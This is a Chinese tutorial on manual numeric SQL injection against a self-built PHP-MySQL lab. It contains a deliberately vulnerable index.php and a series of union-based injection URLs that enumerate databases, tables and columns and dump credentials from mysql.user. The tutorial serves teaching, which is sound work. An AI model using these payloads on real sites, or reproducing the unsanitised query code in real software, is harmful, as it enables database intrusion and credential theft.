SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。

整形注入目录:

搭建测试环境

手工判断SQL注入点

判断数据库权限

判断字段数

判断数据库版本

查询数据库名称

查询字段

查询表中数据

搭建注入测试环境

1.首先在实验之前我们需要搭建相应的环境以供下面SQL注入例子的练习.

a.这里我们在Centos 7 上搭建一个LAMP环境.

[root@localhost ~]# yum install -y httpd httpd-devel mariadb mariadb-server mysql-devel php php-mysql php-common php-gd php-xml

已加载插件:fastestmirror

Loading mirror speeds from cached hostfile

软件包 httpd-2.4.6-80.el7.centos.x86_64 已安装并且是最新版本

软件包 httpd-devel-2.4.6-80.el7.centos.x86_64 已安装并且是最新版本

软件包1:mariadb-5.5.56-2.el7.x86_64 已安装并且是最新版本

软件包1:mariadb-server-5.5.56-2.el7.x86_64 已安装并且是最新版本

软件包1:mariadb-devel-5.5.56-2.el7.x86_64 已安装并且是最新版本

软件包 php-5.4.16-45.el7.x86_64 已安装并且是最新版本

软件包 php-mysql-5.4.16-45.el7.x86_64 已安装并且是最新版本

软件包 php-common-5.4.16-45.el7.x86_64 已安装并且是最新版本

软件包 php-gd-5.4.16-45.el7.x86_64 已安装并且是最新版本

软件包 php-xml-5.4.16-45.el7.x86_64 已安装并且是最新版本

b.进入MySQL并创建一个测试用的数据表,写入一些查询数据.

[root@localhost ~]# mysql -uroot -p

Enter password:

Welcometo the MariaDB monitor. Commands end with ; or\g.

Your MariaDB connection idis 10Server version:5.5.56-MariaDB MariaDB Server

Copyright (c)2000, 2017, Oracle, MariaDB Corporation Ab andothers.

Type'help;' or '\h' for help. Type '\c' to clear the currentinput statement.

MariaDB[(none)]> create databaselyshark;

Query OK,1 row affected (0.06sec)

MariaDB[(none)]> uselyshark;Databasechanged

MariaDB[lyshark]> create tablelyshark (-> `id` int(10) NOT NULL,-> `title` varchar(1000) NOT NULL,-> `text` varchar(1000) NOT NULL

->);

Query OK,0 rows affected (0.13sec)

MariaDB[lyshark]> insert into `lyshark` (`id`, `title`, `text`) values (1,'admin','hello admin');

Query OK,1 row affected (0.00sec)

MariaDB[lyshark]> insert into `lyshark` (`id`, `title`, `text`) values (2,'lyshark','hello lyshark');

Query OK,1 row affected (0.06sec)

MariaDB[lyshark]> insert into `lyshark` (`id`, `title`, `text`) values (3,'guest','hello guest');

Query OK,1 row affected (0.00 sec)

c.在apache网页目录下新建一个index.php文件,配置好权限.

$id = $_GET['id'];

$connection= mysql_connect("127.0.0.1","root","123");

mysql_select_db("lyshark",$connection);

$myquery= "select * from lyshark where id=$id";

$result=mysql_query($myquery);while($row =mysql_fetch_array($result)){echo "编号:".$row['id']."
";echo "标题:".$row['title']."
";echo "内容:".$row['text']."
";echo "


";

}

mysql_close($connection);echo "执行的SQL语句:".$myquery."


";?>

d.访问主页测试看是否能读取数据

http://localhost/index.php?id=1

手工判断SQL注入点

提交单引号

使用and和or判断

我们也可以在参数后面加上 and 1=1 来判断是否存在注入点

和 and 1=0 对比一下看看有啥不同

经过上面的对比,我们可以看到 and 1=1 返回了数据,而and 1=0没有,这是由于1=1是一个为真的条件,前面的结果是true,true and true 所以没有任何问题,第二个 1=0 是个假条件, true and false 还是false,所以并没有数据返回。

接下来看下or、or就是或者,两个都为假,才会为假,只要一个为真就为真,把语句后面的id改成一个不存在的,后面接上or 1=1,这样的话就成了 false or true,结果为true。

下图可以看到,没有返回数据,记录不存在.

通过加法和减法判断

加法和减法的使用要区别是数字型还是字符型的注入、然后来区分了、可以看他后面的参数如果是数字、就一定是数字型、如果是一些字母的话就是字符型注入。

例如

select \* from user where id=4 #数字型注入 sql 语句

select \* from user where username=’fendo’ #字符型注入 sql 语句

输入加号

我们在参数输入1+1,看看返回的数据是不是id等于2的结果,这里注意一下+号在SQL语句是有特效含义的,所以我们要对其进行url编码,最后也就是%2b。

输入减号

减法是同样的道理,不过不需要对-号进行url编码了

判断数据库权限

判断ROOT权限,如果数值则说明存在root权限,否则不存在

and ord(mid(user(),1,1))=114

或者:

and (select count(\*) from mysql.user)>0

解释:

and (select count(\*) from mysql.user)>0 #如果结果返回正常,说明具有读写权限。

and (select count(\*) from mysql.user)>0 #返回错误,应该是管理员给数据库帐户降权了。

判断字段数

对于判断字段数有两种常用的猜测方式:

方式1:用union联合查询:and 1=1 union select 1,2,3,4,5…… 或 union select null,null,null……

UNION SELECT 联合查询:可以用于一个或多个SELECT的结果集,但是他有一个条件,就是两个select查询语句的查询必须要有相同的列才可以执行,利用这个特性我们可以进行对比查询,也就是说当我们union select的列与它查询的列相同时,页面返回正常。在and后面加上1=1或1=2的作用后面会讲。

例如:

a.首先猜测,当字段为2时页面返回错误

b.增加一个字段,为3时,页面显示正确

c.再次增加一个字段,为4时,页面显示错误

上面的结果,说明字段数就是3,输入的数大于或小于字段数时都会报错。使用 union select null,null,null 是一样的效果。

方式2:用order by 查询“order by * -- order by

order by查询:在sql语句中是对结果集的指定列进行排序,比如我们想让结果集按照第一列排序就是 order by 1 按照第二列排序 order by 2 依次类推,按照这个原理我们来判断他的字段数,如果我们按照他的第1列进行排序数据库会返回正常,但是当我们按照第100列排序,但是数据库中并不存在第100列,从而报错。

例如:

a.当我们测试到4时数据库无法显示数据.

b.说明该表只有三个字段.

===================这里存在两个小问题===================

第一个:大部分程序只会调用数据库查询的第一条语句进行查询然后返回(我们这个也是),而通过联合查询出的数据中,我们想看到的数据是在第二条语句中,如果我们想看到我们想要的数据有两种方法,第一种是让第一条数据返回假,

第二种是通过sql语句直接返回我们想要的数据。

第一种:我们让第一个查询的结果始终为假

上图可看到,什么都没有显示,因为填充时使用的null,所以返回的就是空null.

第二种:通过limit语句,limit在mysql中是用来分页的,通过他可以从查询出来的数据中获取我们想要的数据

LIMIT 子句可以被用于强制 SELECT 语句返回指定的记录数。LIMIT 接受一个或两个数字参数。参数必须是一个整数常量。如果给定两个参数,第一个参数指定第一个返回记录行的偏移量,第二个参数指定返回记录行的最大数目,初始记录行的偏移量是 0(而不是 1)。

例如:

SELECT * FROM table LIMIT 5,10; // 检索记录行 6-15

在地址偶棉加入以下代码看看:

上图结果返回也是空,因为这使用的null,所以返回的还是null。

第二个:哪个列中的数据是在页面中显示出来的,有一些列中的数据只是用于后台程序处理,并不会在前台显示,所以我们需要判断哪个字段我们可以看到。

所以,我们要通过数字代替NULL进行查询,来确定哪些字段会在页面中显示。这也就是为什么我们不一开始就用数字而用null,因为union select 不仅要求列的数量相同 同时数据类型也要相似。

查询数据库版本

版本大于5.0的mysql的information_schema库中存储着mysql的所有数据库和表结构信息,所以可以利用information_schema库快速注入。

通过下面的语句可以判断数据库版本:

and ord(mid(version(),1,1))>51

解释1:确认数据库版本,51是ASCII码3 正确则>4.0 错误则<4.0,当版本大于3.0时才能使用union方法;

解释2:ord()是mysql的函数用于获取二进制码;

解释3:mid()是mysql的函数用于截位操作;

解释4:version()是mysql的函数用于获取当前数据库的版本;

显示正确:我这用的的mysql版本是大于5.0的

查询数据库名称

方法1:

可以直接使用mysql自带函数database()查询得到数据库名:

方法2:

使用以下语句语句得到所有的数据库名:

index.php?id=2 union select null,schema_name,null from information_schema.schemata

还可以获取第一个库名:

index.php?id=2 union select null,schema_name,null from information_schema.schemata limit 0,1

上图,并没有显示数据库名而显示的是第一条语句查询出来的结果。在union前面加上and 1=2,就能显示出来了。

index.php?id=2 and 1=2 union select null,schema_name,null from information_schema.schemata limit 0,1

获取第二个库名:

index.php?id=2 and 1=2 union select null,schema_name,null from information_schema.schemata limit 0,2

以此类推,即可获取到全部库..

查询数据表名称

在MySQL中,表名存放在information_schema数据库下tables表table_name字段中、查表名我们主要用到的是TABLES表。

方法1:

用group_concat它可以返回查询的所有结果,因为我们需要通过命名判断该我们需要的敏感数据。

group_concat()会计算哪些行属于同一组,将属于同一组的列显示出来。要返回哪些列,由函数参数(就是字段名)决定。分组必须有个标准,就是根据group by指定的列进行分组。

index.php?id=2 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='lyshark'

上图返回时正确的,数据库中就这3张表、这里我们的目标是lyshark表、因为当前的数据就是lyshark表中获取的。

方法2:

同样,使用下面的语句也是可以查出来的。

index.php?id=2 union select null,table_name,null from information_schema.tables where table_schema='lyshark'

查询字段

在MySQL中,字段名存放在information_schema数据库下columns表column_name字段中,这里使用的是columns表。

方法1:

index.php?id=2 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='lyshark' and table_name='lyshark'

我们也可以查看mysql库user表中的字段。

index.php?id=2 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='mysql' and table_name='user'

上图可以看出,我们已得到mysql库user表的所有字段.

方法2:

index.php?id=2 union select null,column_name,null from information_schema.columns where table_schema='mysql' and table_name='user'

同理,此处就不截图了.

查询表中数据

最终想得到的就是字段里的内容了、前面的数据库名、表名都获得了、获取值就很简单了。

方法1:

查询lyshark库中lyshark表中所有数据。

index.php?id=2 and 1=2 union select 1,group_concat(id,title,text),3 from lyshark

查询mysql数据库user表中的,Host,User,Password字段的内容.

index.php?id=2 and 1=2 union select 1,group_concat(Host,User,Password),3 from mysql.user

上图可以报出mysql的敏感数据.

方法2:

index.php?id=2 union select null,title,content from lyshark

index.php?id=2 union select Host,User,Password from mysql.user

方法3:

index.php?id=2 and 1=2 union select 1,2,concat(user,0x3c,pwd) from admin

方法2和方法3作用相同,此处不截图了。

mysql 数值型注入_SQL注入之PHP-MySQL实现手工注入-数字型相关推荐

  1. mysql sql语句编码_SQL语句实用例子 MySQL编码设置

    SQL语言包含4个部分: ★ 数据定义语言(DDL),例如:CREATE.DROP.ALTER等语句. ★ 数据操作语言(DML),例如:INSERT(插入).UPDATE(修改).DELETE(删除 ...

  2. mysql 数值 字符 优化,教你如何进行Mysql数据类型优化

    1. 版本 1)操作系统版本 cat /proc/version Linux version 3.10.0-957.5.1.el7.x86_64 (mockbuild@kbuilder.bsys.ce ...

  3. 墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)

    0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入.同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清 ...

  4. 渗透学习笔记--基础篇--sql注入(数字型)

    环境:dvwa 1.7数据库:mysql dvwa的安全等级:medium 一.分析和查找注入点 (1)知识点回顾 如果上一篇有好好读过的同学应该知道,我们上一篇遇到的字符型注入.也即是通过Get或者 ...

  5. SQL注入详解(第二章手工注入)

    二.MySQL手工注入 1.SQL注入之sqli-labs环境搭建 往往很多新手在刚学习SQL注入的时候,都需要拥有一个能SQL注入的网站,需要有SQL注入点 的.直接去互联网上找的话对新手未免有点太 ...

  6. mysql 数值型注入_slq-注入总结(中)

    上一节中,大致把sql中的函数记录了下,如果有什么不足希望各位师傅斧正.晚自习没课,所以现在把常见的注入方式,以及利用过程讲一下. 注入类型 数值型注入 也就是说后台的sql语句直接拼接的一个数值,可 ...

  7. mysql sleep详解_sql注入详解(二)

    sql注入详解 4.检测方法 首先是判断能不能进行sql注入 是哪种sql注入 (1)数字型 ?id=1 and 1=1 返回成功?id=1 and 1=2 返回失败 这说明是数字型注入,或者叫整型注 ...

  8. mysql union as 注入_sql注入入门 之 mysql 常规注入 [ union方式 ]

    1,常规数字型 mysql 实例注入点,如下:1https://www.vuln.com/md_materia_profile_view.php?viewid=2 2,依旧先尝试下经典的单引号,如下, ...

  9. mysql中文注入_SQL注入之Mysql报错注入

    --志向和热爱是伟大行为的双翼. 昨天偷懒了没学什么东西,先自我反省一下 - -. 今天认真的学习了一下Mysql报错注入利用方法及原理,好久之前就像认真的学一下这个了,是在上海市大学生网络安全大赛中 ...

最新文章

  1. JavaScript创建或填充任意长度的数组
  2. Spark:获取dataframe某列最大值
  3. 写代码还在用abcd命名,等着出大问题被开除吧(变量命名方法)
  4. 数学模型让咖啡更好喝
  5. mac vscode设置中文_VSCode编写latex
  6. 区块链相关数据报表_区块链相关论文研读5:分布式隐私保护可审计的账本,zkLedger...
  7. 自由软件之父回归 FSF,遭 1933 人、21 家组织联名抵制!
  8. 5 万人在家办公,如何高效协同?字节跳动提供了一份指南
  9. LightOJ-1054 Efficient Pseudo Code
  10. java飞机大战小游戏
  11. 什么是MACD,如何使用MACD指标(新手必学)
  12. 计算机系统的四种启动方式是,电脑启动方式有几种你知道吗?
  13. 【VMware的坑爹之路】VMware复制文件卡死死机;无法访问网络地址“*:\“
  14. 笑死人的12星座宝贝
  15. 可追踪评估模型TAM1
  16. bootstrap3的jumbotron和glyphicon glyphicon-*的用法
  17. 【企业微信开发】企业微信开发测试推送应用消息流程
  18. 关于win7 32bit连接win10共享打印机0x0000011b解决办法
  19. CSS栅格布局grid详解
  20. 离线百度地图,QT添加按钮点击切换卫星地图和街道地图

热门文章

  1. springaop事务逻辑原理_搞懂Spring AOP,这一篇就够了
  2. vue中安装使用echarts
  3. wkwebview 下移20像素_UITableView嵌套WKWebView的那些坑
  4. 内存泄漏的原因及解决办法_编程基础 | C++片段 指针、多态和内存分配
  5. linux 电池管理软件,Linux电源管理(2)_Generic PM之基本概念和软件架构
  6. matlab 设计 18db,基于混沌理论的微弱MPSK信号解调方案设计
  7. gitbook新版本 build命令导出的html不能跳转?
  8. 版是什么_雕版研习 | 什么是版画?版是画的母亲,画是版的子女
  9. 宝塔面板怎么下载php,宝塔面板下怎么安装Mosquitto-php扩展
  10. 正则环视 php,正则表达式基本知识(php)